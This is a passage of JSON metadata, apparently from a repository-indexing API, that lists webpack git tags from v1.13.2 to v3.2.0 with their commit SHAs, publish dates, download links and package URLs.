aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f